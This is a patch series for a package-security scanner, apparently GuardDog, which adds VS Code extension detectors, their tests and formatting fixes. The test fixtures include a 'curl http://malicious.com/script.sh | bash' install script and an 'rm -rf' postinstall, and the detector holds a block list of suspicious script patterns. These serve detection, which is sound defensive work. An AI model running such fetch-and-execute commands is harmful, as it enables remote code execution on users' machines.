assert message is not None + assert "suspicious activation events" in message + assert "onFileSystem:*" in message + + def test_safe_activation_events(self): + package_info = { + "manifest": { + "activationEvents": ["onCommand:myextension.hello", "onLanguage:python"] + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches + + def test_suspicious_script_rm_rf(self): + package_info = { + "manifest": { + "scripts": { + "postinstall": "rm -rf /tmp/something" + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "suspicious script" in message + assert "rm -rf" in message + + def test_suspicious_script_curl(self): + package_info = { + "manifest": { + "scripts": { + "install": "curl http://malicious.com/script.sh | bash" + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "suspicious script" in message + assert "curl" in message + + def test_safe_scripts(self): + package_info = { + "manifest": { + "scripts": { + "compile": "tsc", + "test": "mocha" + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches + + def test_suspicious_dependencies(self): + package_info = { + "manifest": { + "dependencies": { + "child_process": "^1.0.0", + "lodash": "^4.0.0" + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "dangerous dependencies" in message + assert "child_process" in message + + def test_safe_dependencies(self): + package_info = { + "manifest": { + "dependencies": { + "lodash": "^4.0.0", + "axios": "^0.21.0" + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = 
self.detector.detect(package_info) + assert not matches + + def test_unverified_publisher_low_downloads(self): + package_info = { + "manifest": {}, + "marketplace": { + "download_count": 500, + "publisher": { + "flags": [] + }, + "publisher_isDomainVerified": False + }, + "source": "remote" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "unverified publisher" in message + assert "low download count" in message + + def test_verified_publisher_high_downloads(self): + package_info = { + "manifest": {}, + "marketplace": { + "download_count": 100000, + "publisher": { + "flags": ["verified"] + }, + "publisher_isDomainVerified": True + }, + "source": "remote" + } + matches, message = self.detector.detect(package_info) + assert not matches + + def test_terminal_contribution(self): + package_info = { + "manifest": { + "contributes": { + "terminal": { + "profiles": ["custom-terminal"] + } + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "terminal functionality" in message + + def test_task_definitions_contribution(self): + package_info = { + "manifest": { + "contributes": { + "taskDefinitions": [ + { + "type": "custom-task" + } + ] + } + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "task definitions" in message + + + def test_suspicious_sole_category(self): + package_info = { + "manifest": { + "categories": ["Debuggers"] + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert matches + assert message is not None + assert "suspicious sole category" in message + assert "debuggers" in message + + def test_multiple_categories_with_suspicious(self): + package_info = { + "manifest": { + "categories": ["Debuggers", "Machine 
Learning", "Testing"] + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches # Should not flag because multiple categories + +class TestExtensionSuspiciousPublisherDetector: + detector = ExtensionSuspiciousPublisherDetector() + + def test_no_package_info(self): + matches, message = self.detector.detect(None) + assert not matches + assert message is None + + def test_empty_publisher(self): + package_info = { + "manifest": { + "publisher": "" + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches # Handled by empty-information detector + + def test_valid_publisher_local(self): + package_info = { + "manifest": { + "publisher": "microsoft" + }, + "marketplace": {}, + "source": "local" + } + matches, message = self.detector.detect(package_info) + assert not matches diff --git a/tests/core/test_extension_scanner.py b/tests/core/test_extension_scanner.py new file mode 100644 index 00000000..9c533417 --- /dev/null +++ b/tests/core/test_extension_scanner.py @@ -0,0 +1,126 @@ +import os.path +import tempfile +import json + +import pytest + +from guarddog.scanners import ExtensionScanner + + +def test_download_and_get_package_info(): + scanner = ExtensionScanner() + with tempfile.TemporaryDirectory() as tmpdirname: + data, path = scanner.download_and_get_package_info(tmpdirname, "wayou.vscode-todo-highlight") + assert path + assert path.endswith("/wayou.vscode-todo-highlight") + + assert os.path.exists(path) + + package_json_found = False + for root, dirs, files in os.walk(path): + if "package.json" in files: + package_json_found = True + break + assert package_json_found, "package.json should exist in the extracted extension" + + assert "manifest" in data + assert "marketplace" in data + assert data["source"] == "remote" + + marketplace = data["marketplace"] + assert "extensionName" in marketplace + assert "download_count" in 
marketplace + assert "publisher" in marketplace + + manifest = data["manifest"] + assert "name" in manifest + assert "version" in manifest + assert "publisher" in manifest + + +def test_download_and_get_package_info_with_version(): + scanner = ExtensionScanner() + with tempfile.TemporaryDirectory() as tmpdirname: + data, path = scanner.download_and_get_package_info(tmpdirname, "gerane.Theme-FlatlandMonokai", "0.0.6") + assert path + assert path.endswith("/gerane.Theme-FlatlandMonokai") + + manifest = data["manifest"] + assert "version" in manifest + # Note: We're using a relatively stable extension that hasn't been updated in a long while + + +def test_download_and_get_package_info_non_existing_package(): + scanner = ExtensionScanner() + with tempfile.TemporaryDirectory() as tmpdirname: + with pytest.raises(Exception) as exc_info: + scanner.download_and_get_package_info(tmpdirname, "non-existent-publisher.non-existent-extension") + assert "not found" in str(exc_info.value).lower() + + +def test_download_and_get_package_info_non_existing_version(): + scanner = ExtensionScanner() + with tempfile.TemporaryDirectory() as tmpdirname: + with pytest.raises(Exception) as exc_info: + scanner.download_and_get_package_info(tmpdirname, "wayou.vscode-todo-highlight", "999.999.999") + assert "version" in str(exc_info.value).lower() + + +def test_scan_local_extension_directory(): + scanner = ExtensionScanner() + + with tempfile.TemporaryDirectory() as tmpdirname: + # Create a mock extension directory structure + extension_dir = os.path.join(tmpdirname, "test-extension") + os.makedirs(extension_dir) + + package_json = { + "name": "test-extension", + "displayName": "Test Extension", + "description": "A test extension for GuardDog", + "version": "1.0.0", + "publisher": "test-publisher", + "categories": ["Other"], + "activationEvents": ["*"], + "contributes": { + "commands": [ + { + "command": "test.hello", + "title": "Hello World" + } + ] + } + } + + package_json_path = 
os.path.join(extension_dir, "package.json") + with open(package_json_path, 'w') as f: + json.dump(package_json, f) + + result = scanner.scan_local(extension_dir) + + assert "issues" in result + assert "results" in result + + +def test_extract_manifest_metadata_nested_package_json(): + scanner = ExtensionScanner() + + with tempfile.TemporaryDirectory() as tmpdirname: + nested_dir = os.path.join(tmpdirname, "some", "nested", "path") + os.makedirs(nested_dir) + + package_json = { + "name": "nested-extension", + "version": "2.0.0", + "publisher": "nested-publisher" + } + + package_json_path = os.path.join(nested_dir, "package.json") + with open(package_json_path, 'w') as f: + json.dump(package_json, f) + + manifest = scanner._extract_manifest_metadata(tmpdirname) + + assert manifest["name"] == "nested-extension" + assert manifest["version"] == "2.0.0" + assert manifest["publisher"] == "nested-publisher" \ No newline at end of file From 4bce5bdf6c90bb9385dfb77ce1aebeb84751f311 Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Wed, 16 Jul 2025 17:22:47 +0200 Subject: [PATCH 2/7] fix type-check and formatting-induced errors --- guarddog/analyzer/analyzer.py | 91 +++++++---- .../analyzer/metadata/extension/__init__.py | 2 +- .../metadata/extension/empty_information.py | 33 ++-- .../extension/suspicious_permissions.py | 102 +++++++----- .../extension/suspicious_publisher.py | 64 ++++---- guarddog/analyzer/sourcecode/__init__.py | 22 ++- guarddog/reporters/human_readable.py | 21 ++- guarddog/scanners/extension_scanner.py | 145 ++++++++++-------- tests/analyzer/sourcecode/obfuscation.py | 2 +- 9 files changed, 300 insertions(+), 182 deletions(-) diff --git a/guarddog/analyzer/analyzer.py b/guarddog/analyzer/analyzer.py index 6b549fd7..5c88e6b1 100644 --- a/guarddog/analyzer/analyzer.py +++ b/guarddog/analyzer/analyzer.py @@ -67,7 +67,13 @@ def __init__(self, ecosystem=ECOSYSTEM.PYPI) -> None: ".semgrep_logs", ] - def analyze(self, path, info=None, rules=None, name: 
Optional[str] = None, version: Optional[str] = None) -> dict: + def analyze( + self, + path, + info=None, + rules=None, + name: Optional[str] = None, + version: Optional[str] = None) -> dict: """ Analyzes a package in the given path @@ -87,7 +93,8 @@ def analyze(self, path, info=None, rules=None, name: Optional[str] = None, versi sourcecode_results = None # populate results, errors, and number of issues - metadata_results = self.analyze_metadata(path, info, rules, name, version) + metadata_results = self.analyze_metadata( + path, info, rules, name, version) sourcecode_results = self.analyze_sourcecode(path, rules) # Concatenate dictionaries together @@ -95,15 +102,24 @@ def analyze(self, path, info=None, rules=None, name: Optional[str] = None, versi results = metadata_results["results"] | sourcecode_results["results"] errors = metadata_results["errors"] | sourcecode_results["errors"] - output = {"issues": issues, "errors": errors, "results": results, "path": path} + output = { + "issues": issues, + "errors": errors, + "results": results, + "path": path} # Including extension info - pending discussion # if info is not None: # output["package_info"] = info return output - def analyze_metadata(self, path: str, info, rules=None, name: Optional[str] = None, - version: Optional[str] = None) -> dict: + def analyze_metadata( + self, + path: str, + info, + rules=None, + name: Optional[str] = None, + version: Optional[str] = None) -> dict: """ Analyzes the metadata of a given package @@ -132,7 +148,8 @@ def analyze_metadata(self, path: str, info, rules=None, name: Optional[str] = No for rule in all_rules: try: log.debug(f"Running rule {rule} against package '{name}'") - rule_matches, message = self.metadata_detectors[rule].detect(info, path, name, version) + rule_matches, message = self.metadata_detectors[rule].detect( + info, path, name, version) results[rule] = None if rule_matches: issues += 1 @@ -162,7 +179,11 @@ def analyze_sourcecode(self, path, rules=None) -> dict: 
results = semgrepscan_results["results"] | yarascan_results["results"] errors = semgrepscan_results["errors"] | yarascan_results["errors"] - return {"issues": issues, "errors": errors, "results": results, "path": path} + return { + "issues": issues, + "errors": errors, + "results": results, + "path": path} def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: """ @@ -212,30 +233,34 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: continue scan_file_target_abspath = os.path.join(root, f) - scan_file_target_relpath = os.path.relpath(scan_file_target_abspath, path) + scan_file_target_relpath = os.path.relpath( + scan_file_target_abspath, path) matches = scan_rules.match(scan_file_target_abspath) for m in matches: rule_name = m.rule - + if rule_name in verbose_rules: # For verbose rules, we only show that the rule was triggered in the matching file - # We're logging appearances once instead of issue-counting + # We're logging appearances once instead of + # issue-counting file_already_reported = any( finding["location"].startswith(scan_file_target_relpath + ":") for finding in rule_results[rule_name] ) - + if not file_already_reported: finding = { "location": f"{scan_file_target_relpath}:1", - "code": f"Rule triggered in file (matches hidden for brevity)", - 'message': m.meta.get("description", f"{rule_name} rule matched") - } + "code": f'{"Rule triggered in file (matches hidden for brevity)"}', + 'message': m.meta.get( + "description", + f"{rule_name} rule matched")} issues += 1 rule_results[rule_name].append(finding) else: - # For non-verbose rules, show detailed matches as before + # For non-verbose rules, show detailed matches as + # before for s in m.strings: for i in s.instances: finding = { @@ -259,7 +284,10 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: except Exception as e: errors["rules-all"] = f"failed to run rule: {str(e)}" - return {"results": results | rule_results, "errors": errors, 
"issues": issues} + return { + "results": results | rule_results, + "errors": errors, + "issues": issues} def analyze_semgrep(self, path, rules=None) -> dict: """ @@ -284,10 +312,8 @@ def analyze_semgrep(self, path, rules=None) -> dict: errors = {} issues = 0 - rules_path = list(map( - lambda rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yml"), - all_rules - )) + rules_path = list(map(lambda rule_name: os.path.join( + SOURCECODE_RULES_PATH, f"{rule_name}.yml"), all_rules)) if len(rules_path) == 0: log.debug("No semgrep code rules to run") @@ -296,7 +322,8 @@ def analyze_semgrep(self, path, rules=None) -> dict: try: log.debug(f"Running semgrep code rules against {path}") response = self._invoke_semgrep(target=path, rules=rules_path) - rule_results = self._format_semgrep_response(response, targetpath=targetpath) + rule_results = self._format_semgrep_response( + response, targetpath=targetpath) issues += sum(len(res) for res in rule_results.values()) results = results | rule_results @@ -308,7 +335,9 @@ def analyze_semgrep(self, path, rules=None) -> dict: def _invoke_semgrep(self, target: str, rules: Iterable[str]): try: SEMGREP_MAX_TARGET_BYTES = int( - os.getenv("GUARDDOG_SEMGREP_MAX_TARGET_BYTES", MAX_BYTES_DEFAULT)) + os.getenv( + "GUARDDOG_SEMGREP_MAX_TARGET_BYTES", + MAX_BYTES_DEFAULT)) SEMGREP_TIMEOUT = int( os.getenv("GUARDDOG_SEMGREP_TIMEOUT", SEMGREP_TIMEOUT_DEFAULT)) cmd = ["semgrep"] @@ -325,7 +354,11 @@ def _invoke_semgrep(self, target: str, rules: Iterable[str]): cmd.append(f"--max-target-bytes={SEMGREP_MAX_TARGET_BYTES}") cmd.append(target) log.debug(f"Invoking semgrep with command line: {' '.join(cmd)}") - result = subprocess.run(cmd, capture_output=True, check=True, encoding="utf-8") + result = subprocess.run( + cmd, + capture_output=True, + check=True, + encoding="utf-8") return json.loads(str(result.stdout)) except FileNotFoundError: raise Exception("unable to find semgrep binary") @@ -379,9 +412,9 @@ def _format_semgrep_response(self, 
response, rule=None, targetpath=None): file_path = os.path.abspath(result["path"]) code = self.trim_code_snippet( self.get_snippet( - file_path=file_path, start_line=start_line, end_line=end_line - ) - ) + file_path=file_path, + start_line=start_line, + end_line=end_line)) if targetpath: file_path = os.path.relpath(file_path, targetpath) @@ -400,7 +433,11 @@ def _format_semgrep_response(self, response, rule=None, targetpath=None): return results - def get_snippet(self, file_path: str, start_line: int, end_line: int) -> str: + def get_snippet( + self, + file_path: str, + start_line: int, + end_line: int) -> str: """ Returns the code snippet between start_line and stop_line in a file diff --git a/guarddog/analyzer/metadata/extension/__init__.py b/guarddog/analyzer/metadata/extension/__init__.py index e7703441..d47b7801 100644 --- a/guarddog/analyzer/metadata/extension/__init__.py +++ b/guarddog/analyzer/metadata/extension/__init__.py @@ -15,4 +15,4 @@ for detectorClass in classes: detectorInstance = detectorClass() # type: ignore - EXTENSION_METADATA_RULES[detectorInstance.get_name()] = detectorInstance \ No newline at end of file + EXTENSION_METADATA_RULES[detectorInstance.get_name()] = detectorInstance diff --git a/guarddog/analyzer/metadata/extension/empty_information.py b/guarddog/analyzer/metadata/extension/empty_information.py index 2387a3ed..3a2fc7e4 100644 --- a/guarddog/analyzer/metadata/extension/empty_information.py +++ b/guarddog/analyzer/metadata/extension/empty_information.py @@ -13,26 +13,35 @@ class ExtensionEmptyInfoDetector(EmptyInfoDetector): """Detects extensions with empty description information""" - def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, str]: - - log.debug(f"Running extension empty description heuristic on extension {name} version {version}") - + def detect(self, + package_info, + path: Optional[str] = None, + name: Optional[str] = None, + version: 
Optional[str] = None) -> tuple[bool, + str]: + + log.debug( + f"Running extension empty description heuristic on extension {name} version {version}") + if not package_info or not isinstance(package_info, dict): return True, "Extension has no package information" - + manifest = package_info.get("manifest", {}) marketplace = package_info.get("marketplace", {}) source = package_info.get("source", "unknown") - + return self._detect_with_metadata(manifest, marketplace, source) - - def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str) -> tuple[bool, str]: + + def _detect_with_metadata(self, + manifest: dict, + marketplace: dict, + source: str) -> tuple[bool, + str]: """Detect empty information with pre-extracted metadata""" - + manifest_description = manifest.get("description", "").strip() manifest_display_name = manifest.get("displayName", "").strip() - + if not manifest_description and not manifest_display_name: return True, self.MESSAGE_TEMPLATE % "Extension Marketplace (manifest)" - return False, "" \ No newline at end of file + return False, "" diff --git a/guarddog/analyzer/metadata/extension/suspicious_permissions.py b/guarddog/analyzer/metadata/extension/suspicious_permissions.py index 7ffeefd0..b94cf7af 100644 --- a/guarddog/analyzer/metadata/extension/suspicious_permissions.py +++ b/guarddog/analyzer/metadata/extension/suspicious_permissions.py @@ -7,29 +7,36 @@ class ExtensionSuspiciousPermissionsDetector(Detector): """Detects extensions with suspicious permissions or capabilities""" def __init__(self): - super().__init__( - name="suspicious-permissions", - description="Identify extensions with potentially dangerous permissions or suspicious characteristics" - ) - - def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, Optional[str]]: - + super().__init__(name="suspicious-permissions", + description="Identify extensions with potentially" + "dangerous 
permissions or suspicious characteristics") + + def detect(self, + package_info, + path: Optional[str] = None, + name: Optional[str] = None, + version: Optional[str] = None) -> tuple[bool, + Optional[str]]: + if not package_info or not isinstance(package_info, dict): return False, None - + manifest = package_info.get("manifest", {}) marketplace = package_info.get("marketplace", {}) source = package_info.get("source", "unknown") - + return self._detect_with_metadata(manifest, marketplace, source) - - def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str) -> tuple[bool, Optional[str]]: - + + def _detect_with_metadata(self, + manifest: dict, + marketplace: dict, + source: str) -> tuple[bool, + Optional[str]]: + # Check manifest for suspicious activation events activation_events = manifest.get("activationEvents", []) suspicious_activations = [] - + for event in activation_events: if isinstance(event, str): # Very broad activation events that could be suspicious @@ -37,72 +44,89 @@ def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str) suspicious_activations.append(event) elif "onFileSystem:" in event and "*" in event: suspicious_activations.append(event) - + if suspicious_activations: return True, f"Extension uses suspicious activation events: {', '.join(suspicious_activations)}" - + # Check for suspicious scripts in manifest scripts = manifest.get("scripts", {}) if scripts: - suspicious_script_patterns = ['rm -rf', 'del /s', 'format', 'shutdown', 'curl', 'wget', 'powershell'] + suspicious_script_patterns = [ + 'rm -rf', + 'del /s', + 'format', + 'shutdown', + 'curl', + 'wget', + 'powershell'] for script_name, script_content in scripts.items(): if isinstance(script_content, str): for pattern in suspicious_script_patterns: if pattern in script_content.lower(): return True, f"Extension has suspicious script '{script_name}': contains '{pattern}'" - + dependencies = manifest.get("dependencies", {}) dev_dependencies = 
manifest.get("devDependencies", {}) all_deps = {**dependencies, **dev_dependencies} - + # The list is NOT exhaustive, adjust as needed suspicious_deps = ['child_process', 'fs-extra', 'shelljs', 'node-pty'] - found_suspicious_deps = [dep for dep in all_deps.keys() if any(sus in dep for sus in suspicious_deps)] - + found_suspicious_deps = [ + dep for dep in all_deps.keys() if any( + sus in dep for sus in suspicious_deps)] + if found_suspicious_deps: return True, f"Extension uses potentially dangerous dependencies: {', '.join(found_suspicious_deps[:3])}" - + if marketplace and source == "remote": - download_count = marketplace.get("download_count", 0) + download_count = marketplace.get("download_count", 0) # Check if publisher is not verified but has high privileges publisher_info = marketplace.get("publisher", {}) if isinstance(publisher_info, dict): flags = publisher_info.get("flags", []) - is_verified = any("verified" in str(flag).lower() for flag in flags) if flags else False - is_domain_verified = marketplace.get("publisher_isDomainVerified", False) - + is_verified = any("verified" in str(flag).lower() + for flag in flags) if flags else False + is_domain_verified = marketplace.get( + "publisher_isDomainVerified", False) + # Suspicious: unverified publisher with low download count if not is_verified and not is_domain_verified and download_count < 1000: return True, "Extension from unverified publisher with low download count" - + if flags: flag_strings = [str(flag).lower() for flag in flags] - suspicious_flag_patterns = ['preview', 'deprecated', 'malware'] # malware might unnecessary since extensions are swiftly removed from the marketplace - found_suspicious_flags = [flag for flag in flag_strings - if any(pattern in flag for pattern in suspicious_flag_patterns)] + # malware might unnecessary since extensions are swiftly + # removed from the marketplace + suspicious_flag_patterns = [ + 'preview', 'deprecated', 'malware'] + found_suspicious_flags = [ + flag for 
flag in flag_strings if any( + pattern in flag for pattern in suspicious_flag_patterns)] if found_suspicious_flags: return True, f"Extension has suspicious marketplace flags: {', '.join(found_suspicious_flags)}" - + contributes = manifest.get("contributes", {}) if contributes: # Check for dangerous contribution points if contributes.get("terminal"): return True, "Extension contributes terminal functionality which could be dangerous" - + if contributes.get("taskDefinitions"): return True, "Extension contributes task definitions which could execute arbitrary commands" - - # Will add typosquatting checks for most used commands + + # Will add typosquatting checks for most used commands # Check categories for suspicious types categories = manifest.get("categories", []) if categories: - suspicious_categories = ['debuggers', 'other', 'testing', 'snippets'] + suspicious_categories = [ + 'debuggers', 'other', 'testing', 'snippets'] category_strings = [str(cat).lower() for cat in categories] - found_suspicious_cats = [cat for cat in category_strings - if any(sus in cat for sus in suspicious_categories)] + found_suspicious_cats = [ + cat for cat in category_strings if any( + sus in cat for sus in suspicious_categories)] if found_suspicious_cats and len(categories) == 1: # Only flag if it's the sole category return True, f"Extension has potentially suspicious sole category: {found_suspicious_cats[0]}" - - return False, None \ No newline at end of file + + return False, None diff --git a/guarddog/analyzer/metadata/extension/suspicious_publisher.py b/guarddog/analyzer/metadata/extension/suspicious_publisher.py index 7bab15c2..8fc82109 100644 --- a/guarddog/analyzer/metadata/extension/suspicious_publisher.py +++ b/guarddog/analyzer/metadata/extension/suspicious_publisher.py @@ -7,53 +7,65 @@ class ExtensionSuspiciousPublisherDetector(Detector): """Detects extensions with suspicious publisher characteristics""" def __init__(self): - super().__init__( - name="suspicious-publisher", 
- description="Identify extensions with suspicious publisher verification status and typosquatting" - ) - - def detect(self, package_info, path: Optional[str] = None, name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, Optional[str]]: - + super().__init__(name="suspicious-publisher", + description="Identify extensions with suspicious" + "publisher verification status and typosquatting") + + def detect(self, + package_info, + path: Optional[str] = None, + name: Optional[str] = None, + version: Optional[str] = None) -> tuple[bool, + Optional[str]]: + if not package_info or not isinstance(package_info, dict): return False, None - + manifest = package_info.get("manifest", {}) marketplace = package_info.get("marketplace", {}) source = package_info.get("source", "unknown") - - return self._detect_with_metadata(manifest, marketplace, source, package_info) - - def _detect_with_metadata(self, manifest: dict, marketplace: dict, source: str, package_info: dict) -> tuple[bool, Optional[str]]: + + return self._detect_with_metadata( + manifest, marketplace, source, package_info) + + def _detect_with_metadata(self, + manifest: dict, + marketplace: dict, + source: str, + package_info: dict) -> tuple[bool, + Optional[str]]: """Detect suspicious publisher patterns with pre-extracted metadata""" - + manifest_publisher = manifest.get("publisher", "").strip() - + if not manifest_publisher: return False, None # Already handled by empty-information detector - + # TODO: Check for typosquatting using the dedicated detector - + verification_info = [] if marketplace and source == "remote": publisher_info = marketplace.get("publisher", {}) - + if isinstance(publisher_info, dict): # Check if publisher is verified (positive information) flags = publisher_info.get("flags", []) - is_verified = any("verified" in str(flag).lower() for flag in flags) if flags else False - + is_verified = any("verified" in str(flag).lower() + for flag in flags) if flags else False + if 
is_verified: verification_info.append("Publisher is verified") - + # Check if publisher domain is verified (positive information) - is_domain_verified = marketplace.get("publisher_isDomainVerified", False) + is_domain_verified = marketplace.get( + "publisher_isDomainVerified", False) if is_domain_verified: verification_info.append("Publisher domain is verified") - + # If we have positive verification information, include it in a non-suspicious way - # This doesn't return True (not suspicious) but provides information until more robust heuristics are implemented + # This doesn't return True (not suspicious) but provides information + # until more robust heuristics are implemented if verification_info: pass - - return False, None \ No newline at end of file + + return False, None diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index c158549a..72918c1d 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -13,7 +13,8 @@ # These data class aim to reduce the spreading of the logic -# Instead of using the a dict as a structure and parse it difffently depending on the type +# Instead of using the a dict as a structure and parse it difffently +# depending on the type @dataclass class SourceCodeRule: """ @@ -85,7 +86,8 @@ def get_sourcecode_rules( continue for ecosystem in ecosystems: - # avoids duplicates when multiple languages are supported by a rule + # avoids duplicates when multiple languages are supported + # by a rule if not next( filter( lambda r: r.id == rule["id"], @@ -97,11 +99,14 @@ def get_sourcecode_rules( SempgrepRule( id=rule["id"], ecosystem=ecosystem, - description=rule.get("metadata", {}).get("description", ""), + description=rule.get( + "metadata", + {}).get( + "description", + ""), file=file_name, rule_content=rule, - ) - ) + )) yara_rule_file_names = list( filter(lambda x: x.endswith("yar"), os.listdir(current_dir)) @@ -112,7 +117,8 @@ def 
get_sourcecode_rules( rule_id = pathlib.Path(file_name).stem description_regex = fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' - # Default to EXTENSION for general YARA rules (can be adjusted as when other ecosystems are supported) + # Default to EXTENSION for general YARA rules (can be adjusted as when + # other ecosystems are supported) rule_ecosystem = ECOSYSTEM.EXTENSION with open(os.path.join(current_dir, file_name), "r") as fd: @@ -121,8 +127,8 @@ def get_sourcecode_rules( if match: rule_description = match.group(1) SOURCECODE_RULES.append(YaraRule( - id=rule_id, - file=file_name, + id=rule_id, + file=file_name, description=rule_description, ecosystem=rule_ecosystem )) diff --git a/guarddog/reporters/human_readable.py b/guarddog/reporters/human_readable.py index 2bd35f2b..9cd59ce6 100644 --- a/guarddog/reporters/human_readable.py +++ b/guarddog/reporters/human_readable.py @@ -44,15 +44,18 @@ def _format_code_line_for_output(code) -> str: num_issues = results.get("issues") lines = [] - package_info = results.get("package_info") - if num_issues == 0: lines.append( "Found " - + colored("0 potentially malicious indicators", "green", attrs=["bold"]) + + colored( + "0 potentially malicious indicators", + "green", + attrs=["bold"]) + " scanning " - + colored(identifier, None, attrs=["bold"]) - ) + + colored( + identifier, + None, + attrs=["bold"])) lines.append("") else: lines.append( @@ -72,8 +75,12 @@ def _format_code_line_for_output(code) -> str: description = findings[finding] if isinstance(description, str): # package metadata lines.append( - colored(finding, None, attrs=["bold"]) + ": " + description - ) + colored( + finding, + None, + attrs=["bold"]) + + ": " + + description) lines.append("") elif isinstance(description, list): # semgrep rule result: source_code_findings = description diff --git a/guarddog/scanners/extension_scanner.py b/guarddog/scanners/extension_scanner.py index 9b649fa8..a5546660 100644 --- 
a/guarddog/scanners/extension_scanner.py +++ b/guarddog/scanners/extension_scanner.py @@ -1,17 +1,13 @@ import json import logging import os -import pathlib -import tempfile import typing -import zipfile import requests from guarddog.analyzer.analyzer import Analyzer from guarddog.ecosystems import ECOSYSTEM -from guarddog.scanners.scanner import PackageScanner -from guarddog.utils.archives import safe_extract +from guarddog.scanners.scanner import PackageScanner, noop log = logging.getLogger("guarddog") @@ -27,39 +23,47 @@ class ExtensionScanner(PackageScanner): def __init__(self) -> None: super().__init__(Analyzer(ECOSYSTEM.EXTENSION)) - def download_and_get_package_info(self, directory: str, package_name: str, version=None) -> typing.Tuple[dict, str]: + def download_and_get_package_info(self, + directory: str, + package_name: str, + version=None) -> typing.Tuple[dict, + str]: """ Downloads a VSCode extension from the marketplace and extracts it - + Args: directory: Directory to download to package_name: Extension identifier (publisher.extension format) version: Specific version or default to latest - + Returns: Tuple of (extension metadata(manifest and marketplace) info, extracted_path) """ - marketplace_metadata, vsix_url = self._get_marketplace_info_and_url(package_name, version) - + marketplace_metadata, vsix_url = self._get_marketplace_info_and_url( + package_name, version) + file_extension = ".vsix" - vsix_path = os.path.join(directory, package_name.replace("/", "-") + file_extension) + vsix_path = os.path.join( + directory, package_name.replace( + "/", "-") + file_extension) extracted_path = vsix_path.removesuffix(file_extension) - + log.debug(f"Downloading VSCode extension from {vsix_url}") - + self.download_compressed(vsix_url, vsix_path, extracted_path) - + manifest_metadata = self._extract_manifest_metadata(extracted_path) - + combined_metadata = { "marketplace": marketplace_metadata, "manifest": manifest_metadata, - "source": "remote" + "source": 
"remote" } - + return combined_metadata, extracted_path - def _get_marketplace_info_and_url(self, package_name: str, version: typing.Optional[str] = None) -> typing.Tuple[dict, str]: + def _get_marketplace_info_and_url( + self, package_name: str, version: typing.Optional[str] = None) -> typing.Tuple[dict, str]: """Get marketplace metadata and VSIX download URL""" payload = { "filters": [ @@ -74,23 +78,28 @@ def _get_marketplace_info_and_url(self, package_name: str, version: typing.Optio ], "flags": 958 } - - response = requests.post(MARKETPLACE_URL, headers=MARKETPLACE_HEADERS, json=payload) - + + response = requests.post( + MARKETPLACE_URL, + headers=MARKETPLACE_HEADERS, + json=payload) + if response.status_code != 200: - raise Exception(f"Received status code: {response.status_code} from VSCode Marketplace") - + raise Exception( + f"Received status code: {response.status_code} from VSCode Marketplace") + data = response.json() - + if not data.get("results") or not data["results"][0].get("extensions"): - raise Exception(f"Extension {package_name} not found in marketplace") - + raise Exception( + f"Extension {package_name} not found in marketplace") + extension_info = data["results"][0]["extensions"][0] versions = extension_info.get("versions", []) - + if not versions: raise Exception("No versions available for this extension") - + target_version = None if version is None: # if not version is provided, default to latest @@ -102,59 +111,67 @@ def _get_marketplace_info_and_url(self, package_name: str, version: typing.Optio break if target_version is None: raise Exception(f"Version {version} not found for extension") - + # Extract download URL files = target_version.get("files", []) vsix_url = None for file_info in files: - if file_info.get("assetType") == MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE: + if file_info.get( + "assetType") == MARKETPLACE_DOWNLOAD_LINK_ASSET_TYPE: vsix_url = file_info.get("source") break - + if not vsix_url: - raise Exception("No VSIX download 
link available for this extension") - + raise Exception( + "No VSIX download link available for this extension") + # Extract statistics from the statistics array - stats = {stat["statisticName"]: stat["value"] for stat in extension_info.get("statistics", [])} + stats = {stat["statisticName"]: stat["value"] + for stat in extension_info.get("statistics", [])} # ... and the marketplace metadata - # TODO: it might be interesting to add heuristics regarding the rating cound and the weghtedRating (see the ranking algo hack) + # TODO: it might be interesting to add heuristics regarding the rating + # cound and the weghtedRating (see the ranking algo hack) marketplace_metadata = { - "extensionName": extension_info.get("extensionName", ""), - "flags": extension_info.get("flags", []), - "download_count": int(stats.get("downloadCount", 0)), - "publisher": extension_info.get("publisher", {}), - "publisher_flags": extension_info.get("publisher_flags", ""), - "publisher_domain": extension_info.get("domain", ""), - "publisher_isDomainVerified": extension_info.get("publisher_isDomainVerified", False), - } - + "extensionName": extension_info.get( + "extensionName", ""), "flags": extension_info.get( + "flags", []), "download_count": int( + stats.get( + "downloadCount", 0)), "publisher": extension_info.get( + "publisher", {}), "publisher_flags": extension_info.get( + "publisher_flags", ""), "publisher_domain": extension_info.get( + "domain", ""), "publisher_isDomainVerified": extension_info.get( + "publisher_isDomainVerified", False), } + return marketplace_metadata, 